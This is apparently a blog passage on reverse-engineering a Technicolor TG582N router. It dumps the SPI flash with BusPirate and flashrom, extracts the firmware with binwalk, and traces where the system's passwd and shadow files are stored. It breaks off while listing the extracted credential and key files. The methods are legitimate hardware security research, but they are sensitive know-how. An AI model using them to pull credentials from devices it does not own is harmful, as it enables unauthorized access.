Failed to add host 9c:97:26:0c:0c:e9
S67stopload: wait until configuration load reaches phase 9 (now 6, 10s)
S67stopload: wait until configuration load reaches phase 9 (now 6, 11s)
S67stopload: wait until configuration load reaches phase 9 (now 6, 12s)
S67stopload: configuration load reached phase 9...
Intel MicroStack 1.0 - Digital Media Server (DLNA 1.5)(pid = 835),
loc_generate_uuid:25e05aa9-8206-5b77-9aad-d5547194a957
nlplugd start ...
Initializing.
Starting netlink plugin
Daemonize netlink plugin
udhcpcd start ...
monitoripd start ...
anti_spoofd start ...
anti_spoofd : process exit !
 start mud ...
Using /lib/modules/2.6.30/kernel/drivers/usb/host/ehci-hcd.ko
ehci_hcd: USB 2.0 'Enhanced' Host Controller (EHCI) Driver
PCI: Enabling device 0000:00:0a.0 (0000 -> 0002)
PCI: Setting latency timer of device 0000:00:0a.0 to 64
ehci_hcd 0000:00:0a.0: EHCI Host Controller
ehci_hcd 0000:00:0a.0: new USB bus registered, assigned bus number 1
ehci_hcd 0000:00:0a.0: Enabling legacy PCI PM
ehci_hcd 0000:00:0a.0: irq 50, io mem 0x10002500
ehci_hcd 0000:00:0a.0: USB f.f started, EHCI 1.00
monitoripd start ...
anti_spoofd start ...
anti_spoofd : process exit !
 start mud ...
Using /lib/modules/2.6.30/kernel/drivers/usb/host/ehci-hcd.ko
ehci_hcd: USB 2.0 'Enhanced' Host Controller (EHCI) Driver
PCI: Enabling device 0000:00:0a.0 (0000 -> 0002)
PCI: Setting latency timer of device 0000:00:0a.0 to 64
ehci_hcd 0000:00:0a.0: EHCI Host Controller
ehci_hcd 0000:00:0a.0: new USB bus registered, assigned bus number 1
ehci_hcd 0000:00:0a.0: Enabling legacy PCI PM
ehci_hcd 0000:00:0a.0: irq 50, io mem 0x10002500
ehci_hcd 0000:00:0a.0: USB f.f started, EHCI 1.00
usb usb1: configuration #1 chosen from 1 choice
hub 1-0:1.0: USB hub found
hub 1-0:1.0: 1 port detected
Using /lib/modules/2.6.30/kernel/drivers/usb/host/ohci-hcd.ko
ohci_hcd: USB 1.1 'Open' Host Controller (OHCI) Driver
PCI: Enabling device 0000:00:09.0 (0000 -> 0002)
PCI: Setting latency timer of device 0000:00:09.0 to 64
ohci_hcd 0000:00:09.0: OHCI Host Controller
ohci_hcd 0000:00:09.0: new USB bus registered, assigned bus number 2
ohci_hcd 0000:00:09.0: irq 49, io mem 0x10002600
usb usb2: configuration #1 chosen from 1 choice
hub 2-0:1.0: USB hub found
hub 2-0:1.0: 1 port detected
Using /lib/modules/2.6.30/kernel/drivers/usb/class/usblp.ko
usbcore: registered new interface driver usblp
Using /lib/modules/2.6.30/kernel/drivers/usb/serial/usbserial.ko
usbcore: registered new interface driver usbserial
USB Serial support registered for generic
usbcore: registered new interface driver usbserial_generic
usbserial: USB Serial Driver core
Using /lib/modules/2.6.30/kernel/drivers/scsi/scsi_mod.ko
SCSI subsystem initialized
Using /lib/modules/2.6.30/kernel/drivers/scsi/sd_mod.ko
Driver 'sd' needs updating - please use bus_type methods
Using /lib/modules/2.6.30/kernel/drivers/usb/storage/usb-storage.ko
Initializing USB Mass Storage driver...
usbcore: registered new interface driver usb-storage
USB Mass Storage support registered.
Using /lib/modules/2.6.30/kernel/fs/fat/fat.ko
Using /lib/modules/2.6.30/kernel/fs/fat/vfat.ko
Using /lib/modules/2.6.30/kernel/fs/nls/nls_cp437.ko
Using /lib/modules/2.6.30/kernel/fs/nls/nls_iso8859-1.ko
Using /lib/modules/2.6.30/kernel/fs/nls/nls_cp850.ko
Name: /etc/usbmgr/usbmgr.conf
Starting power manager...
Username :

After the boot, there's the good old login screen but without a valid username/password there's not much we can do. One way to proceed is to investigate the filesystem without any sort of access control. Filesystem can be obtained by dumping it directly from the flash memory. Β 

Dumping the flash

Reading the flash memory contents is not something overcomplicated but requires a bit of understanding of how integrated circuits work and how you can obtain the raw contents of the chip using the same interfaces and protocols used by the main CPU during the normal operation of the device.

For this purpose we're targeting the flash memory chip that was inspected above: a Spansion chip FL064pif with its datasheet is available on the manufacture site.

In order to read - and eventually write - its contents, we need to interface with the chip itself, using its pins and using a serial protocol, named SPI. The useful pins are Vcc, CS, SO, SI, SCK and GND and their description is available on the datasheet.

Reverse engineering the router Technicolor TG582N
Reverse engineering the router Technicolor TG582N

Dumping the chip can be done with BusPirate and Flashrom. In order to avoid any desoldering, we'll use a Pomona SOIC clip model 5252. In this case, power we'll be supplied by the BusPirate itself and the board must be switched off. This is because we don't want any interaction from the main CPU that will interfere with the memory chip while we're dumping its contents.

Reverse engineering the router Technicolor TG582N

In-system programming

In this case we were lucky, because powering up the chip itself didn't wake up any other component of the board, like the main CPU. This can happens and depends on how the board is designed and how the components are connected and can vary from board to board. If there's such interference you'll end up with a corrupted dump and flashrom won't alert you in that case. This is why it's a good practice to verify the correctness of the dumping process.

Reverse engineering the router Technicolor TG582N
Dumping the flash
Reverse engineering the router Technicolor TG582N
Verifying the dump

We now have the entire content of the flash memory. We can read, eventually, bootloader, Linux kernel and, more interesting, the root filesystem. Basically we have the entire software stack the manufacturer has deployed on the device.

Firmware extraction

For the extraction we will use the Binwalk utility. It will read the dump and try to recognize and extract any known file format.

[email protected]:~/Projects/tg582n# binwalk dump.bin 

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
45066         0xB00A          LZMA compressed data, properties: 0x5D, dictionary size: 2097152 bytes, uncompressed size: 250804 bytes
132350        0x204FE         PEM certificate
133927        0x20B27         PEM certificate
135518        0x2115E         PEM certificate
262144        0x40000         JFFS2 filesystem, big endian
262496        0x40160         Zlib compressed data, compressed
262760        0x40268         JFFS2 filesystem, big endian
267824        0x41630         Zlib compressed data, compressed
269016        0x41AD8         Zlib compressed data, compressed
269332        0x41C14         Zlib compressed data, compressed
269648        0x41D50         Zlib compressed data, compressed
269844        0x41E14         JFFS2 filesystem, big endian
269960        0x41E88         Zlib compressed data, compressed
270176        0x41F60         Zlib compressed data, compressed
270444        0x4206C         Zlib compressed data, compressed
270892        0x4222C         Zlib compressed data, compressed
271452        0x4245C         Zlib compressed data, compressed
271552        0x424C0         JFFS2 filesystem, big endian
272436        0x42834         Zlib compressed data, compressed
273012        0x42A74         Zlib compressed data, compressed
273548        0x42C8C         Zlib compressed data, compressed
273888        0x42DE0         Zlib compressed data, compressed
274424        0x42FF8         Zlib compressed data, compressed
274764        0x4314C         Zlib compressed data, compressed
275300        0x43364         Zlib compressed data, compressed
275640        0x434B8         Zlib compressed data, compressed
276136        0x436A8         Zlib compressed data, compressed
276476        0x437FC         Zlib compressed data, compressed
277052        0x43A3C         Zlib compressed data, compressed
277268        0x43B14         Zlib compressed data, compressed
277536        0x43C20         Zlib compressed data, compressed
278608        0x44050         Zlib compressed data, compressed
279672        0x44478         Zlib compressed data, compressed
280084        0x44614         JFFS2 filesystem, big endian
280200        0x44688         Zlib compressed data, compressed
280684        0x4486C         JFFS2 filesystem, big endian
280872        0x44928         Zlib compressed data, compressed
281124        0x44A24         Zlib compressed data, compressed
281240        0x44A98         Zlib compressed data, compressed
281336        0x44AF8         Zlib compressed data, compressed
281432        0x44B58         Zlib compressed data, compressed
281460        0x44B74         JFFS2 filesystem, big endian
281676        0x44C4C         Zlib compressed data, compressed
281768        0x44CA8         Zlib compressed data, compressed
281864        0x44D08         Zlib compressed data, compressed
281960        0x44D68         Zlib compressed data, compressed
282056        0x44DC8         Zlib compressed data, compressed
282176        0x44E40         Zlib compressed data, compressed
282300        0x44EBC         Zlib compressed data, compressed
282668        0x4502C         JFFS2 filesystem, big endian
282808        0x450B8         Zlib compressed data, compressed
282932        0x45134         Zlib compressed data, compressed
283152        0x45210         JFFS2 filesystem, big endian
283772        0x4547C         Zlib compressed data, compressed
284068        0x455A4         Zlib compressed data, compressed
284624        0x457D0         JFFS2 filesystem, big endian
285552        0x45B70         Zlib compressed data, compressed
286000        0x45D30         JFFS2 filesystem, big endian
286764        0x4602C         Zlib compressed data, compressed
287224        0x461F8         JFFS2 filesystem, big endian
288020        0x46514         Zlib compressed data, compressed
288456        0x466C8         JFFS2 filesystem, big endian
289736        0x46BC8         Zlib compressed data, compressed
290484        0x46EB4         JFFS2 filesystem, big endian
291892        0x47434         Zlib compressed data, compressed
292352        0x47600         JFFS2 filesystem, big endian
293416        0x47A28         Zlib compressed data, compressed
294336        0x47DC0         JFFS2 filesystem, big endian
295984        0x48430         Zlib compressed data, compressed
296564        0x48674         JFFS2 filesystem, big endian
297632        0x48AA0         Zlib compressed data, compressed
298040        0x48C38         JFFS2 filesystem, big endian
299428        0x491A4         Zlib compressed data, compressed
299856        0x49350         JFFS2 filesystem, big endian
300880        0x49750         Zlib compressed data, compressed
301620        0x49A34         JFFS2 filesystem, big endian
303128        0x4A018         Zlib compressed data, compressed
303684        0x4A244         JFFS2 filesystem, big endian
304808        0x4A6A8         Zlib compressed data, compressed
305152        0x4A800         JFFS2 filesystem, big endian
305828        0x4AAA4         Zlib compressed data, compressed
306220        0x4AC2C         JFFS2 filesystem, big endian
306940        0x4AEFC         Zlib compressed data, compressed
307904        0x4B2C0         JFFS2 filesystem, big endian
309392        0x4B890         Zlib compressed data, compressed
309908        0x4BA94         JFFS2 filesystem, big endian
313324        0x4C7EC         Zlib compressed data, compressed
313900        0x4CA2C         Zlib compressed data, compressed
314436        0x4CC44         Zlib compressed data, compressed
314776        0x4CD98         Zlib compressed data, compressed
315312        0x4CFB0         Zlib compressed data, compressed
315652        0x4D104         Zlib compressed data, compressed
316188        0x4D31C         Zlib compressed data, compressed
316528        0x4D470         Zlib compressed data, compressed
317024        0x4D660         Zlib compressed data, compressed
317364        0x4D7B4         Zlib compressed data, compressed
317940        0x4D9F4         Zlib compressed data, compressed
318236        0x4DB1C         Zlib compressed data, compressed
319308        0x4DF4C         Zlib compressed data, compressed
320616        0x4E468         Zlib compressed data, compressed
323744        0x4F0A0         JFFS2 filesystem, big endian
323884        0x4F12C         Zlib compressed data, compressed
323944        0x4F168         JFFS2 filesystem, big endian
591524        0x906A4         Zlib compressed data, compressed
592100        0x908E4         Zlib compressed data, compressed
592808        0x90BA8         Zlib compressed data, compressed
593516        0x90E6C         Zlib compressed data, compressed
594224        0x91130         Zlib compressed data, compressed
594892        0x913CC         Zlib compressed data, compressed
595468        0x9160C         Zlib compressed data, compressed
595764        0x91734         Zlib compressed data, compressed
596836        0x91B64         Zlib compressed data, compressed
598144        0x92080         Zlib compressed data, compressed
599460        0x925A4         Zlib compressed data, compressed
600036        0x927E4         Zlib compressed data, compressed
600744        0x92AA8         Zlib compressed data, compressed
601452        0x92D6C         Zlib compressed data, compressed
602160        0x93030         Zlib compressed data, compressed
602828        0x932CC         Zlib compressed data, compressed
603404        0x9350C         Zlib compressed data, compressed
603700        0x93634         Zlib compressed data, compressed
604772        0x93A64         Zlib compressed data, compressed
606080        0x93F80         Zlib compressed data, compressed
606568        0x94168         JFFS2 filesystem, big endian
607900        0x9469C         Zlib compressed data, compressed
608608        0x94960         Zlib compressed data, compressed
609316        0x94C24         Zlib compressed data, compressed
610024        0x94EE8         Zlib compressed data, compressed
610692        0x95184         Zlib compressed data, compressed
611200        0x95380         JFFS2 filesystem, big endian
611564        0x954EC         Zlib compressed data, compressed
612568        0x958D8         JFFS2 filesystem, big endian
613128        0x95B08         JFFS2 filesystem, big endian
720922        0xB001A         LZMA compressed data, properties: 0x5D, dictionary size: 2097152 bytes, uncompressed size: 2394632 bytes
1572864       0x180000        Squashfs filesystem, little endian, non-standard signature, version 4.0, compression:gzip, size: 6626892 bytes, 1298 inodes, blocksize: 131072 bytes, created: 2012-10-15 13:38:44

Honestly, this is the first time I had so much results from binwalk. The first thing I noted is the SquashFS signature. From the boot log messages, we know that the root filesystem is in that format:

Kernel command line: root=31:0 ro noinitrd memsize=0x3EDD000 console=ttyS0,115200 root=/dev/mtdblock2 rootfstype=squashfs

So we'll start to dig in that directory first:

[email protected]:~/Projects/tg582n/_dump.bin.extracted/squashfs-root# ll
total 68K
drwxrwxr-x 15 root root 4,0K ott 15  2012 .
drwxr-xr-x 34 root root  12K gen 20 12:06 ..
drwxrwxr-x  3 root root 4,0K ott 15  2012 archive
drwxrwxrwx  2 root root 4,0K mar 26  2012 bin
drwxrwxrwx  6 root root 4,0K mar 26  2012 dev
lrwxrwxrwx  1 root root    6 mar 26  2012 dl -> /rw/dl
drwxrwxr-x 10 root root 4,0K mar 26  2012 etc
drwxrwxrwx  3 root root 4,0K mar 26  2012 lib
drwxrwxrwx  2 root root 4,0K mar 26  2012 nmon
drwxrwxrwx  2 root root 4,0K mar 26  2012 proc
drwxrwxrwx  3 root root 4,0K mar 26  2012 rw
drwxrwxrwx  2 root root 4,0K mar 26  2012 sbin
drwxrwxrwx  2 root root 4,0K mar 26  2012 sys
lrwxrwxrwx  1 root root    8 mar 26  2012 tmp -> /var/tmp
drwxrwxrwx  2 root root 4,0K mar 26  2012 userfs
drwxrwxrwx  5 root root 4,0K mar 26  2012 usr
drwxrwxrwx  2 root root 4,0K mar 26  2012 var
[email protected]:~/Projects/tg582n/_dump.bin.extracted/squashfs-root# 

We're interested into passwd file but looking up in the /etc directory, we find that, like most embedded device, that file is autogenerated and what we see is only a placeholder.

[email protected]:~/Projects/tg582n/_dump.bin.extracted/squashfs-root/etc# ll
total 100K
drwxrwxr-x 10 root root 4,0K mar 26  2012 .
drwxrwxr-x 15 root root 4,0K ott 15  2012 ..
-rw-r--r--  1 root root  513 mar 26  2012 advancedservices.conf
-r--r--r--  1 root root  377 mar 26  2012 autoconf.conf
-r--r--r--  1 root root  133 mar 26  2012 autoip.conf
drwxrwxrwx  2 root root 4,0K mar 26  2012 config
-rw-rw-rw-  1 root root  345 mar 26  2012 fileprofiler.conf
-r--r--r--  1 root root   73 mar 26  2012 fstab
-r--r--r--  1 root root   17 mar 26  2012 fuse.conf
lrwxrwxrwx  1 root root   15 mar 26  2012 group -> ../rw/etc/group
lrwxrwxrwx  1 root root   17 mar 26  2012 gshadow -> ../rw/etc/gshadow
-r--r--r--  1 root root   26 mar 26  2012 host.conf
drwxrwxr-x  2 root root 4,0K mar 26  2012 init.d
-r--r--r--  1 root root  513 mar 26  2012 inittab
-r--r--r--  1 root root  17K mar 26  2012 mime.types
lrwxrwxrwx  1 root root   14 mar 26  2012 mtab -> ../proc/mounts
-r--r--r--  1 root root  465 mar 26  2012 nsswitch.conf
lrwxrwxrwx  1 root root   16 mar 26  2012 passwd -> ../rw/etc/passwd
drwxr-xr-x  2 root root 4,0K mar 26  2012 rc0.d
drwxr-xr-x  2 root root 4,0K mar 26  2012 rc1.d
drwxr-xr-x  2 root root 4,0K mar 26  2012 rc2.d
drwxr-xr-x  2 root root 4,0K mar 26  2012 rc3.d
lrwxrwxrwx  1 root root   21 mar 26  2012 resolv.conf -> ../rw/etc/resolv.conf
lrwxrwxrwx  1 root root   16 mar 26  2012 shadow -> ../rw/etc/shadow
drwxrwxr-x  2 root root 4,0K mar 26  2012 udhcpc
drwxrwxrwx  2 root root 4,0K mar 26  2012 usbmgr
-rw-rw-rw-  1 root root    8 mar 26  2012 version
[email protected]:~/Projects/tg582n/_dump.bin.extracted/squashfs-root/etc#
```

passwd file is a link to another file in the /rw directory that, right now, is empty. How that file is generated during every boot? What script is in charge of managing it? We need to find the answers...

Hunting for the system users

Poking around in /etc directory can be useful because, in the end, this is a standard Linux based system and something in that directory must exist that will reveal us what are the allowed users to the system.

[email protected]:~/Projects/tg582n/_dump.bin.extracted/squashfs-root/etc# tree
.
β”œβ”€β”€ advancedservices.conf
β”œβ”€β”€ autoconf.conf
β”œβ”€β”€ autoip.conf
β”œβ”€β”€ config
β”‚Β Β  β”œβ”€β”€ secrets.tdb -> /rw/etc/secrets.tdb
β”‚Β Β  β”œβ”€β”€ smb.conf -> /rw/etc/smb.conf
β”‚Β Β  └── smbpasswd -> /rw/etc/smbpasswd
β”œβ”€β”€ fileprofiler.conf
β”œβ”€β”€ fstab
β”œβ”€β”€ fuse.conf
β”œβ”€β”€ group -> ../rw/etc/group
β”œβ”€β”€ gshadow -> ../rw/etc/gshadow
β”œβ”€β”€ host.conf
β”œβ”€β”€ init.d
β”‚Β Β  β”œβ”€β”€ anti_spoofd
β”‚Β Β  β”œβ”€β”€ autoipd
β”‚Β Β  β”œβ”€β”€ checkd
β”‚Β Β  β”œβ”€β”€ cifs
β”‚Β Β  β”œβ”€β”€ clinkd
β”‚Β Β  β”œβ”€β”€ cryptomount
β”‚Β Β  β”œβ”€β”€ dropbear
β”‚Β Β  β”œβ”€β”€ fseventd
β”‚Β Β  β”œβ”€β”€ fuse
β”‚Β Β  β”œβ”€β”€ initrandom
β”‚Β Β  β”œβ”€β”€ jffs2contentcheck
β”‚Β Β  β”œβ”€β”€ ledstatus
β”‚Β Β  β”œβ”€β”€ linuxappl
β”‚Β Β  β”œβ”€β”€ longops
β”‚Β Β  β”œβ”€β”€ mbusd_util
β”‚Β Β  β”œβ”€β”€ mocad
β”‚Β Β  β”œβ”€β”€ monitoripd
β”‚Β Β  β”œβ”€β”€ mud
β”‚Β Β  β”œβ”€β”€ mvfs
β”‚Β Β  β”œβ”€β”€ mvfspl
β”‚Β Β  β”œβ”€β”€ network
β”‚Β Β  β”œβ”€β”€ nlplugd
β”‚Β Β  β”œβ”€β”€ no_hotplug_helper
β”‚Β Β  β”œβ”€β”€ powermgr
β”‚Β Β  β”œβ”€β”€ print_server
β”‚Β Β  β”œβ”€β”€ pureftp
β”‚Β Β  β”œβ”€β”€ rc
β”‚Β Β  β”œβ”€β”€ rcS
β”‚Β Β  β”œβ”€β”€ rcS.mountfs
β”‚Β Β  β”œβ”€β”€ rcS.ro
β”‚Β Β  β”œβ”€β”€ rssplugin
β”‚Β Β  β”œβ”€β”€ samba
β”‚Β Β  β”œβ”€β”€ stopload
β”‚Β Β  β”œβ”€β”€ storagepl
β”‚Β Β  β”œβ”€β”€ todd
β”‚Β Β  β”œβ”€β”€ udhcpcd
β”‚Β Β  β”œβ”€β”€ upnpavpl
β”‚Β Β  β”œβ”€β”€ usb-host
β”‚Β Β  β”œβ”€β”€ usb_storage
β”‚Β Β  └── vfspl
β”œβ”€β”€ inittab
β”œβ”€β”€ mime.types
β”œβ”€β”€ mtab -> ../proc/mounts
β”œβ”€β”€ nsswitch.conf
β”œβ”€β”€ passwd -> ../rw/etc/passwd
β”œβ”€β”€ rc0.d
β”œβ”€β”€ rc1.d
β”‚Β Β  β”œβ”€β”€ K01mvfs -> ../init.d/mvfs
β”‚Β Β  β”œβ”€β”€ S01jffs2contentcheck -> ../init.d/jffs2contentcheck
β”‚Β Β  β”œβ”€β”€ S10no_hotplug_helper -> ../init.d/no_hotplug_helper
β”‚Β Β  β”œβ”€β”€ S20network -> ../init.d/network
β”‚Β Β  β”œβ”€β”€ S21vega -> ../init.d/vega
β”‚Β Β  β”œβ”€β”€ S21wps -> ../init.d/wps
β”‚Β Β  β”œβ”€β”€ S22linuxappl -> ../init.d/linuxappl
β”‚Β Β  β”œβ”€β”€ S41fseventd -> ../init.d/fseventd
β”‚Β Β  β”œβ”€β”€ S45storagepl -> ../init.d/storagepl
β”‚Β Β  β”œβ”€β”€ S45vfspl -> /etc/init.d/vfspl
β”‚Β Β  β”œβ”€β”€ S46mvfspl -> ../init.d/mvfspl
β”‚Β Β  β”œβ”€β”€ S47checkd -> ../init.d/checkd
β”‚Β Β  β”œβ”€β”€ S47cifs -> ../init.d/cifs
β”‚Β Β  β”œβ”€β”€ S48todd -> ../init.d/todd
β”‚Β Β  β”œβ”€β”€ S48upnpavpl -> ../init.d/upnpavpl
β”‚Β Β  β”œβ”€β”€ S49rssplugin -> ../init.d/rssplugin
β”‚Β Β  β”œβ”€β”€ S55fuse -> ../init.d/fuse
β”‚Β Β  β”œβ”€β”€ S56mvfs -> ../init.d/mvfs
β”‚Β Β  β”œβ”€β”€ S67stopload -> ../init.d/stopload
β”‚Β Β  β”œβ”€β”€ S68su_intf -> ../init.d/su_intf
β”‚Β Β  β”œβ”€β”€ S69la_intf -> ../init.d/la_intf
β”‚Β Β  β”œβ”€β”€ S71nlplugd -> ../init.d/nlplugd
β”‚Β Β  β”œβ”€β”€ S72udhcpcd -> ../init.d/udhcpcd
β”‚Β Β  β”œβ”€β”€ S73monitoripd -> ../init.d/monitoripd
β”‚Β Β  β”œβ”€β”€ S74anti_spoofd -> ../init.d/anti_spoofd
β”‚Β Β  β”œβ”€β”€ S80dropbear -> ../init.d/dropbear
β”‚Β Β  β”œβ”€β”€ S97mud -> ../init.d/mud
β”‚Β Β  β”œβ”€β”€ S97usb-host -> ../init.d/usb-host
β”‚Β Β  └── S99powermgr -> ../init.d/powermgr
β”œβ”€β”€ rc2.d
β”œβ”€β”€ rc3.d
β”‚Β Β  β”œβ”€β”€ S01jffs2contentcheck -> ../init.d/jffs2contentcheck
β”‚Β Β  β”œβ”€β”€ S10no_hotplug_helper -> ../init.d/no_hotplug_helper
β”‚Β Β  β”œβ”€β”€ S20network -> ../init.d/network
β”‚Β Β  β”œβ”€β”€ S21vega -> ../init.d/vega
β”‚Β Β  β”œβ”€β”€ S22linuxappl -> ../init.d/linuxappl
β”‚Β Β  β”œβ”€β”€ S47checkd -> ../init.d/checkd
β”‚Β Β  β”œβ”€β”€ S67stopload -> ../init.d/stopload
β”‚Β Β  β”œβ”€β”€ S71nlplugd -> ../init.d/nlplugd
β”‚Β Β  β”œβ”€β”€ S72udhcpcd -> ../init.d/udhcpcd
β”‚Β Β  β”œβ”€β”€ S73monitoripd -> ../init.d/monitoripd
β”‚Β Β  └── S74anti_spoofd -> ../init.d/anti_spoofd
β”œβ”€β”€ resolv.conf -> ../rw/etc/resolv.conf
β”œβ”€β”€ shadow -> ../rw/etc/shadow
β”œβ”€β”€ udhcpc
β”‚Β Β  └── udhcpc.script
β”œβ”€β”€ usbmgr
β”‚Β Β  β”œβ”€β”€ class -> /var/usbmgr/class
β”‚Β Β  β”œβ”€β”€ dextension
β”‚Β Β  β”œβ”€β”€ host -> /var/usbmgr/host
β”‚Β Β  β”œβ”€β”€ preload.conf
β”‚Β Β  β”œβ”€β”€ storage
β”‚Β Β  β”œβ”€β”€ umts_custom
β”‚Β Β  β”œβ”€β”€ update_usbmgrconf
β”‚Β Β  β”œβ”€β”€ usbledctrl
β”‚Β Β  β”œβ”€β”€ usbmgr.conf -> /var/tmp/usbmgr.conf
β”‚Β Β  β”œβ”€β”€ usbmgr.conf.ro
β”‚Β Β  └── vendor -> /var/usbmgr/vendor
└── version

For what it seems, interesting files in /etc directory are symlinks to the relative ones in /rw and, for me, rw has something to do with Read and Write operations. Let's search some evidence of this path in configuration files:

[email protected]:~/Projects/tg582n/_dump.bin.extracted/squashfs-root/etc# grep -ir rw
init.d/clinkd:CLINKCONF_DEST=/rw/etc/
init.d/clinkd:    #CPE_P00075123:CJ:Change clink.conf to a rw location
init.d/usb_storage:		# eb 3c 90, we're definitely dealing with a FAT boot sector. Otherwise, we
init.d/usb_storage:    SMBD_STATUS=0 # 0 means that cifs service is stopped (otherwise it is running)
init.d/jffs2contentcheck:#    push down of dl partition content into /rw/dl
init.d/jffs2contentcheck:	# New layout: (USERFS mounted on /rw)
init.d/jffs2contentcheck:	#      /dl --> /rw/dl
init.d/jffs2contentcheck:	if [ "`cat /proc/mounts | grep /dev/mtdblock0 | grep /rw`" ]; then
init.d/jffs2contentcheck:		[ -d /rw/etc ] || mkdir -m 775 /rw/etc
init.d/jffs2contentcheck:		if [ ! -d /rw/dl ]; then
init.d/jffs2contentcheck:			echo " Detected old jffs2 partition layout! Converting /rw to new layout"
init.d/jffs2contentcheck:			mkdir -m 775 /rw/dl
init.d/jffs2contentcheck:			for file in /rw/*; do
init.d/jffs2contentcheck:				([ "${file}" = "/rw/dl" ] || [ "${file}" = "/rw/etc" ]) && continue
init.d/jffs2contentcheck:				mv ${file} /rw/dl/
init.d/jffs2contentcheck:	#     /rw --> /userfs/config-bank-X
init.d/jffs2contentcheck:	#     /dl --> /rw/dl
init.d/jffs2contentcheck:	# Set /rw correctly: since /rw is on rootfs which is read-only, we
init.d/jffs2contentcheck:	mount -o bind $CONFDIR /rw
advancedservices.conf:HDTOOLSDIR="/rw/disk"
advancedservices.conf:FLASHCONFIGDIR="/rw/etc/"
mime.types:application/vnd.vectorworks

We found thatclinkd, jffs2contentcheck and advancedservices.conf have something to do with the /rw directory. Let's review these evidence.

  • clinkd: in the comment section of the script: "This is the init script for the Entropic clinkd daemon". I wasn't able to find useful informations about this daemon.
  • advancedservices.conf: nothing too much interesting here, only a small nudge to the fact that /rw/etc is the writable part of the flash.
  • jffs2contentcheck: this is interesting, we found plenty of informations in this script. For better understand its purpose, this is the full source and, actually, it's pretty well commented.
#!/bin/sh

####
# This script checks and converts the layout of the writable partition to its
# latest version.
#
# Changelog:
#  * 7.4.4 > 8.1.1:
#    push down of dl partition content into /rw/dl
#    [Steven Aerts -- 2008/03/12]
####

. /etc/autoconf.conf

start () {

	# Verify 7.4.4 to 8.1.1 userfs migration
	# Old layout: (USERFS mounted on /dl)
	#      USERFS/user.ini
	#      USERFS/etc/...
	#      USERFS/tls/...
	# New layout: (USERFS mounted on /rw)
	#      USERFS/etc/...
	#      USERFS/dl/user.ini
	#      USERFS/dl/tls/...
	#      /dl --> /rw/dl
	if [ "`cat /proc/mounts | grep /dev/mtdblock0 | grep /rw`" ]; then
		[ -d /rw/etc ] || mkdir -m 775 /rw/etc
		if [ ! -d /rw/dl ]; then
			echo " Detected old jffs2 partition layout! Converting /rw to new layout"
			mkdir -m 775 /rw/dl
			for file in /rw/*; do
				([ "${file}" = "/rw/dl" ] || [ "${file}" = "/rw/etc" ]) && continue
				mv ${file} /rw/dl/
			done
		fi
	fi

	# Migrate to dual bank layout
	# New layout: (USERFS mounted on /userfs)
	#     USERFS/config-bank-X/etc/...
	#     USERFS/config-bank-X/dl/...
	#     /rw --> /userfs/config-bank-X
	#     /dl --> /rw/dl
	
	# Determine booted bank from command line
	BOOTID=$(sed -n "s/.*btab_bootid=\([0-9]\+\).*/\1/p" /proc/cmdline)

	# If BOOTID is empty, set it to a certain value (single-bank case)
	[ -z "$BOOTID" ] && BOOTID=999

	CONFDIR="/userfs/config-bank-$BOOTID"

	# Create a config directory for the booted bank if it does not yet exist
	[ ! -d $CONFDIR ] && mkdir $CONFDIR
	# Set /rw correctly: since /rw is on rootfs which is read-only, we
	# cannot use a symlink. However, mount supports the bind option which
	# essentially does the same.
	mount -o bind $CONFDIR /rw
	# If there are any files/directories in /userfs (config-bank-X
	# directories excluding), move them to the config directory of the
	# booted bank. This indicates a first boot from BLI.
	for i in $(ls /userfs | grep -v "^config-bank-*" | grep -v "^common$"); do
		mv /userfs/$i $CONFDIR
	done
	# If the config directory is still empty, copy the configuration
	# from another bank to allow a 'correct' boot. This can happen when
	# you upgrade an rbi with the bootloader.
	# NOTE: there is no guarantee that this configuration will work, but
	# it's better to have something.
	if [ -z "$(ls $CONFDIR | grep -v "^version$" 2>/dev/null)" -a -x /usr/bin/copyconfig ]; then
		/usr/bin/copyconfig "lastboot" $BOOTID
	fi

	# Set the 'lastboot' symlink to the current configuration
	rm -f /userfs/config-bank-lastboot
	ln -sf $CONFDIR /userfs/config-bank-lastboot

	# Copy the version file from /etc to /userfs/config-bank-X
	if [ -f /etc/version ]; then
		cp /etc/version $CONFDIR
	else
		echo "Unknown" > $CONFDIR/version
	fi

	# Create a common userfs directory
	[ ! -d /userfs/common ] && mkdir /userfs/common

}


case $1 in
start)
	start
	;;
stop)
	;;
restart)
	;;
*)
	echo "Usage $0 [start|stop|restart]"
	exit 1
	;;
esac

What's JFFS2 filesystem?

JFFS2 (Journaled Flash File System v2) is a file system designed for use on Flash devices such as those commonly found in embedded systems. Unlike some other file systems which may be stored on the Flash device and then copied into RAM during boot (i.e. ramdisk) JFFS2 actually resides on the Flash device and allows the user to read/write data to Flash. This is particularly useful in embedded devices that wish to save some persistent data between reboots. [cit]

We finally found where the persistent informations are saved. Coming back to the binwalk analysis, I remember many signature related to JFFS2 filesystem. Let's review the evidences extracted:

[email protected]:~/Projects/tg582n/_dump.bin.extracted# tree jff*
jffs2-root
└── fs_1
    β”œβ”€β”€ common
    β”‚Β Β  └── flash_image_fii
    β”œβ”€β”€ config-bank-999
    β”‚Β Β  β”œβ”€β”€ dl
    β”‚Β Β  β”‚Β Β  β”œβ”€β”€ persistent.cnf
    β”‚Β Β  β”‚Β Β  β”œβ”€β”€ phy.conf
    β”‚Β Β  β”‚Β Β  β”œβ”€β”€ seed.dat
    β”‚Β Β  β”‚Β Β  β”œβ”€β”€ stsZWEADQ8.CM0.upg
    β”‚Β Β  β”‚Β Β  β”œβ”€β”€ tls
    β”‚Β Β  β”‚Β Β  β”‚Β Β  β”œβ”€β”€ cert0001.pem
    β”‚Β Β  β”‚Β Β  β”‚Β Β  └── pkey0001.pem
    β”‚Β Β  β”‚Β Β  β”œβ”€β”€ user.ini
    β”‚Β Β  β”‚Β Β  └── xdsl.inf
    β”‚Β Β  β”œβ”€β”€ etc
    β”‚Β Β  β”‚Β Β  β”œβ”€β”€ group
    β”‚Β Β  β”‚Β Β  β”œβ”€β”€ gshadow
    β”‚Β Β  β”‚Β Β  β”œβ”€β”€ passwd
    β”‚Β Β  β”‚Β Β  β”œβ”€β”€ resolv.conf
    β”‚Β Β  β”‚Β Β  β”œβ”€β”€ secrets.tdb
    β”‚Β Β  β”‚Β Β  β”œβ”€β”€ shadow
    β”‚Β Β  β”‚Β Β  β”œβ”€β”€ smb.conf
    β”‚Β Β  β”‚Β Β  └── smbpasswd
    β”‚Β Β  └── version
    └── config-bank-lastboot -> /userfs/config-bank-999
jffs2-root-0
└── fs_1
    β”œβ”€β”€ common
